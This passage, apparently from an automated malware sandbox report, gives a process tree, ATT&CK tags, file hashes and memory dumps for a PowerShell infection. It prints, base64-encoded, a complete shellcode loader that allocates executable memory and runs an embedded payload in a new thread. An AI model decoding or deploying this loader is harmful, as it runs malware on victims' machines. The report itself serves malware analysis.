AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABpAFkAVwAgACQANgAzAFUAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA2ADMAVQBTACAAJABlACIAOwB9AA==
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABPAE8AVQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE8ATwBVACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYQAsADAAeABiAGUALAAwAHgAMwAxACwAMAB4ADcANAAsADAAeAA0AGEALAAwAHgANwA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEANwAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZgAzACwAMAB4ADcAMAAsADAAeABhADgALAAwAHgAOABkACwAMAB4ADAAZgAsADAAeAA5ADAALAAwAHgAYQAzACwAMAB4ADYAZQAsADAAeABlAGYALAAwAHgANgAxACwAMAB4AGQAYwAsADAAeAA1AGYALAAwAHgAMwBkACwAMAB4ADAANQAsADAAeAA5ADcALAAwAHgAZgAyACwAMAB4AGYAMQAsADAAeAA0AGYALAAwAHgANAAyACwAMAB4ADcAOQAsADAAeABhADMALAAwAHgANAAzACwAMAB4ADAANgAsADAAeAAyAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeABlADcALAAwAHgAZABlACwAMAB4AGUAMAAsADAAeABjADcALAAwAHgAMwAxACwAMAB4ADYAYQAsADAAeAA3AGMALAAwAHgAZgAwACwAMAB4ADAAYwAsADAAeABhAGMALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAAwAGUALAAwAHgANQAwACwAMAB4ADIAZQAsADAAeAAxADEALAAwAHgAZgAwACwAMAB4ADYAOQAsADAAeABlADEALAAwAHgANgA0ACwAMAB4AGYAMQAsADAAeABhAGUALAAwAHgAYgA0ACwAMAB4ADAAMwAsADAAeAAxAGUALAAwAHgANgAyACwAMAB4ADEAMQAsADAAeAA2ADcALAAwAHgAYgAyACwAMAB4ADkAMwAsADAAeAAxADYALAAwAHgAMwA1ACwAMAB4ADAAZgAsADAAeAA5ADUALAAwAHgAZgA4ACwAMAB4ADMAMQAsADAAeAAyAGYALAAwAHgAZQBkACwAMAB4ADcAZAAsADAAeAA4ADUALAAwAHgAYwA0ACwAMAB4ADQAMQAsADAAeAA3AGMALAAwAHgAZAA2ACwAMAB4AGEAZQAsADAAeAAxADIALAAwAHgANgA2ACwAMAB4ADgANgAsADAAeAAzAGIALAAwAHgAZgBhACwAMAB4AGIANgAsADAAeAAyADcALAAwAHgAZQBmACwAMAB4ADcAZQAsADAAeAA3AGYALAAwAHgANQAzACwAMAB4ADMAMwAsADAAeABjADgALAAwAHgAZgA0ACwAMAB4AGEAOAAsADAAeABjADAALAAwAHgAYwBiACwAMAB4AGQAYwAsADAAeABlADAALAAwAHgAMgA5ACwAMAB4AGYAYQAsADAAeAAyADAALAAwAHgAYQBlACwAMAB4ADEANwAsADAAeAAzADIALAAwAHgAYQBkACwAMAB4AGEAZQAsADAAeAA1ADAALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABjADUALAAwAHgAYQBhACwAMAB4ADAANQAsADAAeABmADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgAMgBlACwAMAB4ADYAYQAsADAAeAA2AGYALAAwAHgAZABmACwAMAB4AGEANQAsADAAeABjAGMALAAwAHgANABiACwAMAB4AGUAMQAsADAAeAA2AGEALAAwAHgAOABhACwAMAB4ADEAOAAsADAAeABlAGQALAAwAHgAYwA3ACwAMAB4AGQAOAAsADAAeAA0ADcALAAwAHgAZgAyACwAMAB4AGQANgAsADAAeAAwAGQALAAwAHgAZgBjACwAMAB4ADAAZQAsADAAeAA1ADMALAAwAHgAYgAwACwAMAB4AGQAMwAsADAAeAA4ADYALAAwAHgAMgA3ACwAMAB4ADkANwAsADAAeABmADcALAAwAHgAYwAzACwAMAB4AGYAYwAsADAAeABiADYALAAwAHgAYQBlACwAMAB4AGEAOQAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGIAMQAsADAAeAAxADYALAAwAHgAMABjACwAMAB4ADYAMgAsADAAeABiADkALAAwAHgAYgA1ACwAMAB4ADUAYgAsADAAeAAxADIALAAwAHgANAAyACwAMAB4ADQANgAsADAAeAA2ADQALAAwAHgANABlACwAMAB4AGQANQAsADAAeAA4AGEALAAwAHgAYQA4ACwAMAB4ADcAMQAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAMQA3ACwAMAB4ADAAYQAsADAAeAAxADcALAAwAHgAOABkACwAMAB4ADEAYgAsADAAeABjADMALAAwAHgAYgAxACwAMAB4ADQAYQAsADAAeAAyAGQALAAwAHgAYwAzACwAMAB4ADQAMgAsADAAeAA4ADQALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABiAGQALAAwAHgAMgA1ACwAMAB4AGUANgAsADAAeAA4AGQALAAwAHgANwA5ACwAMAB4ADcAMQAsADAAeABiADYALAAwAHgAYQA1ACwAMAB4AGEAOAAsADAAeABmAGEALAAwAHgANQBkACwAMAB4ADMANgAsADAAeAA1ADUALAAwAHgAMgBmACwAMAB4AGMAYgAsADAAeAAzAGMALAAwAHgAYwAxACwAMAB4ADEAMAAsADAAeABhADQALAAwAHgANAAxACwAMAB4ADQAOAAsADAAeABmADkALAAwAHgAYgA3ACwAMAB4ADQAMQAsADAAeAA3AGIALAAwAHgAYQA1ACwAMAB4ADMAZQAsADAAeABhADcALAAwAHgAMgBiACwAMAB4ADAANQAsADAAeAAxADEALAAwAHgANwA4ACwAMAB4ADgAYgAsADAAeABmADUALAAwAHgAZAAxACwAMAB4ADIAOAAsADAAeAA2ADMALAAwAHgAMQBjACwAMAB4AGQAZQAsADAAeAAxADcALAAwAHgAOQAzACwAMAB4ADEAZgAsADAAeAAzADQALAAwAHgAMwAwACwAMAB4ADMAOQAsADAAeABmADAALAAwAHgAZQAxACwAMAB4ADYAOAAsADAAeABkADUALAAwAHgANgA5ACwAMAB4AGEAOAAsADAAeABlADMALAAwAHgANAA0ACwAMAB4ADcANQAsADAAeAA2ADYALAAwAHgAOABlACwAMAB4ADQANgAsADAAeABmAGQALAAwAHgAOAA1ACwAMAB4ADYAZQAsADAAeAAwADgALAAwAHgAZgA2ACwAMAB4AGUAMAAsADAAeAA3AGMALAAwAHgAZgBjACwAMAB4AGYANgAsADAAeABiAGUALAAwAHgAZABmACwAMAB4AGEAYQAsADAAeAAwADkALAAwAHgAMQA1ACwAMAB4ADcANQAsADAAeAA1ADIALAAwAHgAOQBjACwAMAB4ADkAMgAsADAAeABkAGMALAAwAHgAMAA1ACwAMAB4ADAAOAAsADAAeAA5ADkALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeAA5ADcALAAwAHgANgAyACwAMAB4ADYAYwAsADAAeABmAGEALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABjAGYALAAwAHgAOQA0ACwAMAB4ADUAZQAsADAAeAAxADcALAAwAHgAZAAwACwAMAB4ADYANAAsADAAeAAwADkALAAwAHgANwBkACwAMAB4AGQAMAAsADAAeAAwAGMALAAwAHgAZQBkACwAMAB4ADIANQAsADAAeAA4ADMALAAwAHgAMgA5ACwAMAB4AGYAMgAsADAAeABmADMALAAwAHgAYgA3ACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAZgBjACwAMAB4AGUAMQAsADAAeAA1ADcALAAwAHgAMgBmACwAMAB4ADkANAAsADAAeAAwAGYALAAwAHgAOABlACwAMAB4ADAANwAsADAAeAAzAGIALAAwAHgAZQBmACwAMAB4AGUANQAsADAAeAA5ADkALAAwAHgAMAA3ACwAMAB4ADIANgAsADAAeABjADMALAAwAHgAZQBmACwAMAB4ADYAOQAsADAAeABmAGEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADUATQB6AHgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkADUATQB6AHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkADUATQB6AHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkabgcj9.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1305.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1304.tmp"
6⤵
PID:2844

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1305.tmp
Filesize
1KB

MD5
f0fe977865dd9b1ec0e669c3f7f05c1c

SHA1
f2af817439569bdc1e2ad6dab731ba69229601a0

SHA256
52b172286c38141ff901567d56420300e2881275ed0168f57b6309976405706e

SHA512
b6f1486883d696f2502c24ae2b9ab19ce4917880f855b22627348b5cc31213c4997f41f39337051582d6441ffe60a229ef730fc847badd03eefc0648e8cb3f39

Download Submit
C:\Users\Admin\AppData\Local\Temp\gkabgcj9.dll
Filesize
3KB

MD5
41b3a64af07baa071f39ab1e69692da0

SHA1
6e31c83cb33d19758e9fbfe56b1e79e3552eb0ce

SHA256
31f5c8bf88377b2f9593760ac43e34cfab7d8ba3490f90a339784a647ea39c16

SHA512
5f85a48d3841c0a1b973a52fb128ffdbcf6047fb1aa99043e9435492358370709b8f9e138a48f382e788a21b905a9ae53734d8d550bf105306f77cc3cbe96a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\gkabgcj9.pdb
Filesize
7KB

MD5
a599383a527cc6243f0534a8e4abd08b

SHA1
5a92872088ea1f0658465c5feb8b896f33f7edb2

SHA256
072c8ef85be0b7c321a522d5fff0a965ad8e3cb01ef8641ebd85c34643aa3015

SHA512
6cfc41fff50ab57edca639bc0ca53428ffb7a27b08453d1005e85255ac22dfcb2d04cab7a23839f45b27b2ac5cf26e01a0683437112ef0f7290502ae2dd95981

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\880IJDP8NDT2XX01LFMF.temp
Filesize
7KB

MD5
fc2066b33f687d0ec044e7e1a7de135d

SHA1
53f48b8486c0c25e6f01f4643c7b492be3ef025f

SHA256
e642eb6e8a3fe4c0127f2ab4e7924593ef9b025a6cf21eccb2321fd1fe8004d2

SHA512
83539360d0d29fc3b72e64d390a136f265c8bd3efc14b6b1fd08b741e26c9f621c8d3ae16b2f87ec2693db416e1d6a3eae0f904b92724eefc5b37deff968cbea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1304.tmp
Filesize
652B

MD5
aa2a0d6bf922a6efebeb4d58c06483a0

SHA1
eb77590e4cf7b158772d10abdefeaa72f7222d56

SHA256
9365a5adfba949886e2c1f65a26e9b26f2b1522b477103a606e8cbbb282b8a63

SHA512
f0202a2eb21fdbc627d4fdcee3f2ed1e4a2a3f03b1a61dd2717bda1a7ea3d5181434534facea059293a26f2d154064e9565e4ac4cff757e1986d28b8d1106bdd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gkabgcj9.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gkabgcj9.cmdline
Filesize
309B

MD5
b756e9f094bb822bbf247066b0c88c74

SHA1
4938568250b7afb1cfbc005bc9704e46ddfb4662

SHA256
b61d21611fe0327891f8d6fc00b3fe3fe409b4615f08fe2204b32ccee8a18362

SHA512
2427a93e669ec265e8dc1014fcaef9028713174e57fdc585cbcc7fd09b634625cff604595ece3726ac1d673af6b9ebec3b5a8991db662bb4d322230e70741dae

Download Submit
memory/1752-1-0x0000000000E80000-0x0000000000EA6000-memory.dmp

Filesize
152KB

Download
memory/1752-2-0x000007FEF53C0000-0x000007FEF5DAC000-memory.dmp

Filesize
9.9MB

Download
memory/1752-33-0x000007FEF53C0000-0x000007FEF5DAC000-memory.dmp

Filesize
9.9MB

Download
memory/1752-0-0x000007FEF53C3000-0x000007FEF53C4000-memory.dmp

Filesize
4KB

Download
memory/1752-32-0x000007FEF53C3000-0x000007FEF53C4000-memory.dmp

Filesize
4KB

Download
memory/1800-7-0x000007FEF29DE000-0x000007FEF29DF000-memory.dmp

Filesize
4KB

Download
memory/1800-9-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/1800-12-0x000007FEF2720000-0x000007FEF30BD000-memory.dmp

Filesize
9.6MB

Download
memory/1800-10-0x000007FEF2720000-0x000007FEF30BD000-memory.dmp

Filesize
9.6MB

Download
memory/1800-8-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/1800-11-0x000007FEF2720000-0x000007FEF30BD000-memory.dmp

Filesize
9.6MB

Download
memory/1800-13-0x000007FEF2720000-0x000007FEF30BD000-memory.dmp

Filesize
9.6MB

Download
memory/1800-34-0x000007FEF2720000-0x000007FEF30BD000-memory.dmp

Filesize
9.6MB

Download
memory/2744-31-0x0000000002AC0000-0x0000000002AC1000-memory.dmp

Filesize
4KB

Download